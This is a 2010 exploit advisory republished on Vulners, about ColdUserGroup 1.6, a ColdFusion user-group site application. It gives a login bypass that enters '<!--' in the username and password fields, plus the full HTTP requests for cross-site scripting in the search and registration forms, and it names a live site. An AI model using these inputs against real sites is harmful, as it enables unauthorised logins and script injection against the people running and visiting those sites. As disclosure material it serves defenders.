Vulners
Lucene search
ColdUserGroup 1.6 Bypass / Cross Site Scripting
`#**********************************************************
# Exploit Title: ColdUserGroup - Version 1.6 bypass/XSS Vulnerabilities
# Date: 09/09/2010
# Author: Sangteamtham
# Software Link: http://www.coldgen.com/index.cfm?ColdGen=ProductDetails&ProductID=8
# Version: 1.22
# Tested on: Windows 7
#
#***********************************************************
1.Description:
Built using Fusebox and adhering to CSS/XHTML standards the ColdUserGroup application is intended to allow a quickstart to hosting your own user group web site. Currently in live use at www.actcfug.com. Some of the features in use on the live site have been removed but can be easily integrated (ie: Google Calendar). This new version now utilises FCKEditor as the rich text editor, rather than the original ActivEdit
2. Exploit
2.a: bypass login
http://site.com/index.cfm?actcfug=MemberLoginForm
User Name:<!--
Password :<!--
2.b: XSS vul:
In Search Form and register form, the vendor does not filter the special characters.So attackers will put the malicious code into that form.
3. Poc:
Victim: http://victim.com/index.cfm
3.a. Login form:
I found it work just in opera Version 10.61 only
3.b. Forgotten form:
3.b.1:
http://site.com/index.cfm?fuseaction=LookupPassword
+Header:
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.actcfug.com/index.cfm?actcfug=SearchSite
Cookie: CFID=974979; CFTOKEN=59397041; __utma=125918109.619983113.1284030540.1284030540.1284033833.2; __utmz=125918109.1284030540.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8430f8fc4fd40c79c0eba2e6d59e557c2e4a; __utmc=125918109; __utmb=125918109
+ Post data:
Content-type: application/x-www-form-urlencoded\r\n
Content-length: 99\r\n
\r\n
SubmitForm=Search%20Site&Keywords=[XSS here]&Category=Articles
3.b.2:
Header:
Host: www.actcfug.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.actcfug.com/index.cfm?actcfug=MemberJoin
Cookie: CFID=974979; CFTOKEN=59397041; __utma=125918109.619983113.1284030540.1284030540.1284033833.2; __utmz=125918109.1284030540.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8430f8fc4fd40c79c0eba2e6d59e557c2e4a; __utmc=125918109; __utmb=125918109
Post data:
Content-type: application/x-www-form-urlencoded\r\n
Content-length: 419\r\n
\r\n
Join=%20%20%20Join%20the%20ACTCFUG%20%20%20&UserName=sangte&UserPassword=123456&ConfirmPassword=123456&UserFirstName=[XSS HERE]&UserLastName=amtham&UserEmailAddress=sangte%40ok%2Ecom&Newsletter=true&EmailAccount=false
4. Patch:
Vender should filter the special characters when input the form.
5. Credits:
Thanks flying to Vietnamese hackers and all hackers out there researching for more security.
*************************************************************
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Sep 2010 00:00Current
7.4High risk
Vulners AI Score7.4